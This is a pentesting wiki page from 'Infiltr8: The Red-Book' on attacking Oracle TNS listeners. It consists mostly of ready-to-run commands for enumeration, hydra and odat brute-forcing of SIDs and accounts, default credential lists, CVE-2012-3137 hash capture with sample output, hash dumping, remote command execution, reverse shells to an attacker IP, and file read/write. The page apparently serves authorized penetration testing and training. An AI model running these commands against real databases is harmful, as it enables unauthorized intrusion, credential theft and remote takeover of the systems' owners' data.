Infiltr8: The Red-Book
Infiltr8ForumGitHub
  • The Red-Book
  • Red-Teaming
    • Reconnaissance
      • DNS Enumeration
      • Subdomains enumeration
      • Email Harvesting
      • Host Discovery
      • TCP/UDP Service Scanning
      • Vulnerability Scanning
      • Google Dorks
      • GitHub Recon
      • Files Metadata
      • 🛠️Maltego
      • 🛠️Specialized Search Engines
    • Execution
      • Code & Process Injection
        • Loading .NET Reflective Assembly
        • Loading .NET Assembly from Windows Script Hosting
        • Process Hollowing
        • WndProc Callback Shellcode Execution
        • Fibers Shellcode Execution
        • Vector Exception Handler Shellcode Execution
        • NtQueueApcThread & NtTestAlert Shellcode Execution
        • Thread Pool Callback Shellcode Execution
        • Module Stomping Shellcode Injection
        • Remote .NET Assembly Loading through WaaSRemediation DCOM Abuse
        • 🛠️DLL Injection
        • 🛠️CreateRemoteThread Injection
        • 🛠️Reflective DLL Injection
        • 🛠️NtMapViewOfSection Injection
        • 🛠️SetWindowHookEx Injection
        • 🛠️PoolParty
        • 🛠️MockingJay
      • Code Execution
        • CMSTP
        • MSBuild
        • MSHTA
        • Microsoft Office Execution
        • Windows Script Host (WSH)
        • Outlook Home Page Abuse (Specula)
        • Powershell Without Powershell.exe
        • RegSrv32
        • Scheduled Tasks
        • Services
        • Windows Library Files
        • HTML Help Files
        • WMI
        • Script Exploits
        • 🛠️Sliver
    • Initial Access
      • Network Services
      • Password Attacks
      • Phishing
        • HTML Smuggling
        • Phishing with Calendars (.ICS Files)
        • Phishing With Microsoft Office
          • MS Office - VBA (Macros)
          • MS Office - RTF Files RCE
          • MS Office - Custom XML parts
          • 🛠️MS Office - Excel 4.0 (XLM) Macros
          • 🛠️MS Office - VBA Stomping
          • 🛠️MS Office - Remote Dotm Template Injection
        • 🛠️Phishing via Proxy
          • Adversary in the Middle (AitM) Phishing
            • EvilGoPhish
            • Evilginx
            • Muraena
            • Modlishka
          • Browser in the Middle (BitM) Phishing
            • cuddlephish
            • EvilnoVNC
    • Persistence
      • Active Directory
      • Windows
        • Accessibility features Backdoor
        • AEDebug Keys Persistence
        • Image File Execution Options (IFEO) Persistence
        • Logon Triggered Persistence
        • LSA Persistence
          • Security Support Provider DLLs
          • Authentication Package
        • Natural Language 6 DLLs Persistence
        • Run Keys Persistence
        • Winlogon Persistence
        • WMI Event Subscription Persistence
      • Linux
        • SSH for Persistence
        • GSocket for Persistence
        • 🛠️Udev rules
    • Defense Evasion
      • Endpoint Detection Respons (EDR) Bypass
        • Bring Your Own Vulnerable Driver (BYOVD)
        • Safe Mode With Networking
        • Windows Defender Application Control (WDAC): Killing EDR
        • 🛠️Load Unsigned Drivers
        • 🛠️Minifilter Altitude
        • 🛠️Hypervisor Code Integrity (HVCI) Disallowed Images
        • 🛠️Windows Filtering Platform (WFP)
        • 🛠️Userland Hooking Bypass
      • UAC Bypass
      • AMSI Bypass
      • ETW evasion
      • Living Off The Land
        • Windows Sysinternals
        • LOLBAS Project
        • File Operations
        • File Executions
      • Signature Evasion
      • Obfuscation
        • PowerShell Obfuscation
        • 🛠️Commandline Obfusaction
        • 🛠️PE Obfuscation
        • 🛠️String Encryption
      • AppLocker Bypass
      • Mark-of-the-Web (MotW) Bypass
      • 🛠️PowerShell Constrained Language Mode (CLM) Bypass
      • 🛠️Kill Windows Defender
      • 🛠️Virtualization-based security (VBS) Bypass
        • 🛠️Credential Guard bypass
        • 🛠️hypervisor-protected code integrity (HVCI) Bypass
        • 🛠️Windows Defender Application Control (WDAC) Bypass
      • 🛠️Sandbox Evasion
    • Discovery
      • Active Directory
      • Windows
        • System Information
        • Processes & Services
        • Scheduled Tasks
        • Installed applications
        • Network Configuration
        • FIle/Folder ACLs
        • Knowing your Shell
        • Security Solutions
      • Linux
        • OS Details
        • 🛠️Process & Services
    • Privilege Escalation
      • Windows
        • Tools ⚙️
        • PowerShell Logging
        • Credentials In Files
        • Abusing Tokens
        • Insecure Services
          • Weak Service Permissions
          • Weak File/Folder Permissions
          • Weak Registry Permissions
          • Unquoted Service Path
        • AlwaysInstallElevated
        • AutoLogon Registry
        • Insecure Scheduled Tasks
          • Weak File/Folder Permissions
        • 🛠️DLL Hijacking
      • Linux
        • Kernel Exploits
          • OverlayFs Exploits
            • GameOverlayFs
            • CVE-2023-0386
            • CVE-2021-3493
          • CVE-2023-32233 (CAP_NET_ADMIN)
          • Dirty Pipe
          • 🛠️DirtyCow
          • 🛠️RDS
          • 🛠️Full Nelson
          • 🛠️Mempodipper
        • GLIBC Exploits
          • Looney Tunables
        • Polkit Exploits
          • PwnKit
          • D-Bus Authentication Bypass
        • Sudo Exploits
          • Sudo Binaries
          • Sudo Misconfigurations
          • Reuse Sudo Tokens
          • User Restriction Bypass
          • Pwfeedback BOF
          • Baron Samedit
          • Sudoedit Bypass
        • SUID Binaries
        • Script Exploits
          • Python
            • Pip Download Code Execution
            • PyInstaller Code Execution
            • Pytorch Models/PTH Files Code Execution
          • Ruby
          • Bash
          • Perl
        • Scheduled tasks
          • Cron Jobs
          • Systemd timers
        • Interesting Groups
          • Lxd
        • Capabilities
        • NFS no_root_squash/no_all_squash
        • Linux Active Directory
    • Credential Access
      • Password Stores
        • Windows Credential Manager
        • KeePass
        • Web Browsers
      • Unsecured Credentials
        • Credentials In Files
        • VNC Config
        • SSH Private Keys
        • Git Repositories
        • Veeam Backup
        • Network shares
        • Network protocols
      • OS Credentials
        • Windows & Active Directory
          • SAM & LSA secrets
          • DPAPI secrets
          • NTDS secrets
          • LSASS secrets
          • DCSync
          • Kerberos key list
          • Group Policy Preferences
          • AutoLogon Registry
          • In-memory secrets
          • Cached Kerberos tickets
        • Linux
          • Shadow File
          • In-memory secrets
          • Linux Cached Kerberos tickets
      • MITM and coerced auths
      • Password Attacks
        • Default, weak & Leaked Passwords
        • Generate Wordlists
        • Brute-Force
          • Online - Attacking Services
          • Offline - Password Cracking
      • Impersonation
    • Lateral Movement
      • Port Forwarding
      • TLS Tunneling (Ligolo-ng)
      • HTTP(s) Tunneling
      • SSH Tunneling
      • DNS Tunneling
      • SMB-based
      • WinRM
      • Remote WMI
      • DCOM
      • Scheduled Tasks (ATSVC)
      • Services (SVCCTL)
    • Exfiltration
      • Exfiltration over ICMP
      • Exfiltration Over DNS
      • Exfiltration Over HTTP(s)
      • Exfiltration Over SMB
  • Web Pentesting
    • Reconnaissance
      • Subdomains enumeration
      • WAF Enumeration
    • Infrastructures
      • DBMS
        • Enum Databases
        • Read/Write/Execute
      • DNS
        • Subdomain Takeover
      • Web Servers
        • Nginx
        • Apache
          • Apache Commons Text
          • Apache Tomcat
      • CMS
        • Wordpress
        • 🛠️Joomla
        • 🛠️Drupal
        • 🛠️Bolt CMS
      • Frameworks
        • Spring Framework
          • Spring Routing Abuse
          • Spring Boot Actuators
          • Spring View Manipulation
        • Werkzeug
        • 🛠️Django
        • 🛠️Flask
        • 🛠️Laravel
      • CGI
    • Web Vulnerabilities
      • Server-Side
        • NoSQL Injection
        • SQL Injection
          • UNION Attacks
          • Blind Attacks
            • Boolean Based
            • Time Based
            • Error Based
        • Insecure Deserialization
          • .NET Deserialization
          • Python Deserialization
          • PHP Deserialization
          • 🛠️Java Deserialization
          • 🛠️Ruby Deserialization
        • File Inclusion & Path Traversal
          • LFI to RCE
            • PHP Wrappers
            • Logs Poisoning
            • /proc
            • PHPInfo
            • PHP Sessions
            • Segmentation Fault
          • RFI to RCE
        • Command Injection
        • Brute-Force
        • SSTI (Server-Side Template Injection)
        • Exposed Git Repositories
        • 🛠️File Upload
      • Client-Side
        • XSS (Cross-Site Scripting)
        • CORS (Cross-origin resource sharing)
  • Network Pentesting
    • Network services
      • DNS
      • FastCGI
      • HTTP & HTTPS
      • LDAP
      • NFS
      • MS-RPC
      • MSSQL
      • NBT-NS (NetBIOS)
      • Oracle TNS
      • RDP
      • Rsync
      • SMB
      • SMTP
      • SNMP
      • SSH
      • WebDAV
      • WinRM
      • XMPP/Jabber
      • 🛠️RPC Port Mapper
      • 🛠️FTP
      • 🛠️Telnet
      • 🛠️MySQL
    • WiFi
      • 🛠️WEP
      • 🛠️WPA2
      • 🛠️WPS
    • Bluetooth
  • Active Directory Pentesting
    • Reconnaissance
      • Tools ⚙️
        • PowerView ⚙️
        • Responder ⚙️
        • BloodHound ⚙️
        • enum4linux ⚙️
      • Network
        • DHCP
        • DNS
        • NBT-NS
        • Port scanning
        • SMB
        • LDAP
        • MS-RPC
      • Objects & Settings
        • DACLs
        • Group policies
        • Password policy
        • LAPS
    • Movement
      • Credentials
        • Dumping
        • Cracking
        • Bruteforcing
          • Guessing
          • Spraying
          • Stuffing
        • Shuffling
      • MITM and coerced auths
        • ARP poisoning
        • DNS spoofing
        • DHCP poisoning
        • DHCPv6 spoofing
        • WSUS spoofing
        • LLMNR, NBT-NS, mDNS spoofing
        • ADIDNS poisoning
        • WPAD spoofing
        • MS-EFSR abuse (PetitPotam)
        • MS-RPRN abuse (PrinterBug)
        • MS-FSRVP abuse (ShadowCoerce)
        • MS-DFSNM abuse (DFSCoerce)
        • MS-EVEN abuse (CheeseOunce)
        • PushSubscription abuse
        • WebClient abuse (WebDAV)
        • Living off the land
        • 🛠️NBT Name Overwrite
        • 🛠️ICMP Redirect
      • NTLM
        • Capture
        • Relay
        • Pass the hash
      • Kerberos
        • Pre-auth bruteforce
        • Pass the key
        • Overpass the hash
        • Pass the ticket
        • Pass the cache
        • Forged tickets
          • Silver tickets
          • Golden tickets
          • Diamond tickets
          • Sapphire tickets
          • RODC Golden tickets
          • MS14-068
        • ASREQroast
        • ASREProast
        • Kerberoast
        • Delegations
          • (KUD) Unconstrained
          • (KCD) Constrained
          • (RBCD) Resource-based constrained
          • S4U2self abuse
          • Bronze Bit
        • Shadow Credentials
        • UnPAC the hash
        • Pass the Certificate - PKINIT
        • sAMAccountName spoofing
        • SPN-jacking
      • Netlogon
        • ZeroLogon
      • DACL abuse
        • AddMember
        • ForceChangePassword
        • Targeted Kerberoasting
        • WriteOwner
        • ReadLAPSPassword
        • ReadGMSAPassword
        • Grant ownership
        • Grant rights
        • Logon script
        • Rights on RODC object
      • Group policies
      • Trusts
      • Certificate Services (AD-CS)
        • Certificate templates
        • Certificate authority
        • Access controls
        • Unsigned endpoints
        • Certifried
      • Schannel
        • Pass the Certificate - Schannel
      • SCCM / MECM
        • Privilege Escalation
        • Post Exploitation
      • Exchange services
        • PrivExchange
        • ProxyLogon
        • ProxyShell
        • ProxyNotShell
      • Print Spooler Service
        • PrinterBug
        • PrintNightmare
      • Built-ins & settings
        • Builtin Groups
          • DNSAdmins
          • AD Recycle Bin
        • MachineAccountQuota
        • Pre-Windows 2000 computers
        • RODC
    • Persistence
      • Skeleton key
      • SID History
      • AdminSDHolder
      • GoldenGMSA
      • Kerberos
        • Forged tickets
        • Delegation to KRBTGT
      • Certificate Services (AD-CS)
        • Certificate authority
        • Access controls
        • Golden certificate
      • LAPS
      • 🛠️DC Shadow
      • 🛠️Access controls
  • 🛠️Cloud & CI/CD Pentesting
    • CI/CD
      • Ansible Pentesting
      • Artifactory Pentesting
      • Docker Registry
        • 🛠️HTTP API V2
      • 🛠️Kubernetes
      • 🛠️GitLab
      • 🛠️Github
      • 🛠️Gitea
      • 🛠️Jenkins
      • 🛠️Terraform
    • Azure Pentesting
      • Reconnaissance
        • Tools ⚙️
        • Unauthenticated Reconnaissance
        • Internal Reconnaissance
      • Movement
        • Credentials
          • Password Spraying
          • Token Manipulation
            • Pass-The-Cookie (PTC)
            • Pass the Certificate (Azure)
            • Pass the PRT
        • Aazure Resources
          • Key Vault
          • Storage Accounts
          • Virtual Machines
          • Automation
          • Databases
        • Role-Based Access
        • Conditional Access
        • Service Principals & Applications
        • Hybrid Identity
          • Password Hash Sync (PHS)
          • Pass-through Authentication (PTA)
          • Active Directory Federation Services (ADFS)
          • Seamless SSO
          • Cloud Kerberos Trust
        • Cross-Tenant Access
      • Persistence
    • GCP Pentesting
    • AWS Pentesting
  • 🛠️Smart Contracts Pentesting
    • Solidity
      • Vulnerabilities
        • Delegatecall Attack
        • Denial of Service Attack
        • Overflow & Underflow
        • Reentrancy Attack
        • Self Destruct Attack
        • Tx Origin Attack
Powered by GitBook
On this page
  • Theory
  • Practice
  • Enumerate version
  • Commands & Brute-force
  • Targeting SID
  • Targeting Accounts
  • Logging into a Remote Database
  • Remote Code Execution
  • Read/Write files
  • OracleSQL Privilege Escalation
  • Automation Tools
  • Resources

Was this helpful?

Edit on GitHub
  1. Network Pentesting
  2. Network services

Oracle TNS

Pentesting Oracle TNS - TCP Ports 1521,1522-1529

Last updated 5 months ago

Was this helpful?

Theory

Oracle clients communicate with the database using the Transparent Network Substrate (TNS) protocol. When the listener receives a connection request (1521/TCP, -you may also get secondary listeners on 1522–1529-), it starts up a new database process and establishes a connection between the client and the Oracle database.

Practice

Enumerate version

Using nmap scripts, we can enumerate the version of the TNS-Listener

nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>

We can enumerate the TNS-Listener using the tool

tnscmd10g version -p 1521 -h <IP>

Commands & Brute-force

When enumerating Oracle the first step is to talk to the TNS-Listener

# Return the current status and variables used by the listener
tnscmd10g status -p 1521 -h <IP>

# Dump service data
tnscmd10g services -p 1521 -h <IP>

# Dump debugging information to the listener log
tnscmd10g debug -p 1521 -h <IP>

# Write the listener configuration file to a backup location
tnscmd10g save_config -p 1521 -h <IP>

If you receive an error, could be because TNS versions are incompatible (Use the --10G parameter with tnscmd10) and if the error persist, the listener may be password protected

We can use hydra to brute-force TNS-Listener password

hydra -P rockyou.txt -t 32 -s 1521 <IP> oracle-listener

Targeting SID

The SID (Service Identifier) is essentially the database name, depending on the install you may have one or more default SIDs, or even a totally custom dba defined SID.

#Using Hydra
hydra -L sid.txt -s 1521 <IP> oracle-sid

#Using odat
odatPLSEXTPROC sidguesser -s $SERVER -d $SID --sids-file=./sids.txt

# Interesting Wordilists
cat /usr/share/metasploit-framework/data/wordlists/sid.txt
cat /usr/share/nmap/nselib/data/oracle-sids

In some old versions (in 9 it works) we can enumerate the SID using tnscmd10g

#The SID are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)
tnscmd10g status-p 1521 -h <IP>

Targeting Accounts

Once we have found a valid SID, the next step is account enumeration. From this point, you can connect to the listener and brute-force credentials.

#Odat
odat passwordguesser -s $SERVER -d $SID
odat passwordguesser -s $SERVER -d $SID -p 1521 --accounts-files users.txt pass.txt

#Hydra
hydra -L /tmp/user.txt -P /tmp/pass.txt -s 1521 $SERVER oracle /$SID

#Nmap
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=$SID $SERVER
# User/Password list
cat /usr/share/nmap/nselib/data/oracle-default-accounts.lst

# User Password list
cat /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt

# User/Password list
cat /usr/share/oscanner/accounts.default 

Below are some of the default passwords associated with Oracle:

  • DBSNMP/DBSNMP  —  Intelligent Agent uses this to talk to the db server (its some work to change it)

  • SYS/CHANGE_ON_INSTALL  —  Default sysdba account before and including Oracle v9, as of version 10g this has to be different!

  • PCMS_SYS/PCMS_SYS  —  Default x account

  • WMSYS/WMSYS  —  Default x account

  • OUTLN/OUTLN  —  Default x account

  • SCOTT/TIGER  —  Default x account

Stealremotepwds - CVE-2012-3137

The versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable to this technique

Using nmap we can retreive intercept the initial traffic during authorization phase and extract a hash to bruteforce it offline:

root@kali:~# nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30

Starting Nmap 6.49BETA4 (https://nmap.org) at 2016-03-02 14:58 EST
Nmap scan report for 10.11.21.30
PORT     STATE SERVICE
1521/tcp open  oracle
| oracle-brute-stealth:
|   Accounts
|     SYS:$o5logon$1245C95384E15E7F0C893FCD1893D8E19078170867E892CE86DF90880E09FAD3B4832CBCFDAC1
|     A821D2EA8E3D2209DB6*4202433F49DE9AE72AE2 - 
|     Hashed valid or invalid credentials
|   Statistics
|_    Performed 241 guesses in 12 seconds, average tps: 20

john hashes.txt

Also, we can use odat

# Test module
odat stealremotepwds -s <IP> -U <username> -P <password> -d <SID> --test-module

# Obtain the session key and salt for user list
odat stealremotepwds -s <IP> -U <username> -P <password> -d <SID> --get-all-passwords --user-list /usr/share/nmap/nselib/data/oracle-default-accounts.lst

Dump Oracle Hashes

Password hashes in Oracle are stored in the sys.users$ or dba_users tables. With permissions, we can extract them using odat

You may want to add the --sysdba to make it works

# Test the module before use it
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --test-module

# Dump hashes
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords

# Dump hashes indirectly with CVE-2020-2984 for 12c or higher 
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords-ocm

# Dump hashes from history
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords-from-history

# Dump hashes with DBMS_STAT
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords-dbms-stats

Logging into a Remote Database

sqlplus <username>/<password>@<ip_address>:<port>/<SID>

If an account has system database priviledges (sysdba) or system operator (sysop) you may wish to try the following:

sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba'
sqlplus <username>/<password>@<ip_address>/<SID> 'as sysoper'

Remote Code Execution

If an account has system database priviledges (sysdba) or system operator (sysop) you may add following args when using odat:

--sysdba
--sysoper
# Execute commands
odat java -s <IP> -U <username> -P <password> -d <SID> --exec COMMAND

# Get a reverse shell
odat java -s <IP> -d <SID> -U <username> -P <password> --reverse-shell <ATTACKING_IP> <PORT>
# Execute commands
odat dbmsscheduler -s <IP> -d <SID> -U <username> -P <password> --exec "C:\windows\system32\cmd.exe /c echo 123&gt;&gt;C:\hacK"

# Get a reverse shell
odat dbmsscheduler -s <IP> -d <SID> -U <username> -P <password> --reverse-shell <ATTACKING_IP> <PORT>
odat externaltable -s <IP> -U <username> -P <password> -d <SID> --exec "C:/windows/system32" "calc.exe"

Read/Write files

#Read file
odat utlfile -s <IP> -d <SID> -U <username> -P <password> --getFile "C:/RemotePath" remote_file.txt local_file.txt

#Write file
odat utlfile -s <IP> -d <SID> -U <username> -P <password> --putFile "C:/RemotePath" remote_file.txt local_file.txt

#Remove file
odat utlfile -s <IP> -d <SID> -U <username> -P <password> --removeFile "C:/RemotePath" remote_file.txt
#Read file
odat externaltable -s <IP> -U <username> -P <password> -d <SID> --getFile "C:/RemotePath" remote_file.txt local_file.txt

OracleSQL Privilege Escalation

#Get module Help
odat privesc -s $SERVER -d $ID -U $USER -P $PASSWORD -h

Automation Tools

An interesting tool is oscanner, which will try to get some valid SID and then it will brute-force for valid credentials and try to extract some information:

#apt install oscanner
oscanner -s <IP> -P <PORT>
# Bruteforce SID and check all
odat all -s <IP> -p <PORT>

# Bruteforce accounts for that SID and check all
odat all -s <IP> -p <PORT> -d <SID>

# Check all for that acccount
odat all -s <IP> -p <PORT> -d <SID> -U <USER> -P <PASSWORD>

# Check all for that acccount as SYSDBA or SYSOPER
odat all -s <IP> -p <PORT> -d <SID> -U <USER> -P <PASSWORD> --sysdba
odat all -s <IP> -p <PORT> -d <SID> -U <USER> -P <PASSWORD> --sysoper

Resources

We can brute-force SID using or

We can use or , or to bruteforce accounts on a known SID

Here are mixed wordlists taken from and some interesting other wordlists

Other default passwords can be found and

To login using known credentials, we can use

We can try to execute code using Java Stored Procedure

We can try to execute code using and Oracle Scheduler

We can try to execute code using and Oracle External Tables

ODAT requires the privilege ‘CREATE ANY DIRECTORY’, which, by default, is granted only to DBA role, since it attempts to execute the file from any and not only “your” directory ( of this attack requires less privileges).

We can try to read/write files using and utlfile

We can try to read files using and Oracle External Tables

We may use the module from odat to escalate our privileges on the DB. On that link you will find several ways to escalate privileges using odat.

Another tool that will do all of this is

tnscmd10g
Hydra
Odat
Hydra
odat
nmap
hacktricks
here
here
sqlplus
odat
odat
odat
the manual version
odat
odat
privesc
odat
Logo1521,1522-1529 - Pentesting Oracle TNS ListenerHackTricks
9KB
pass-oracle.txt
9KB
users-oracle.txt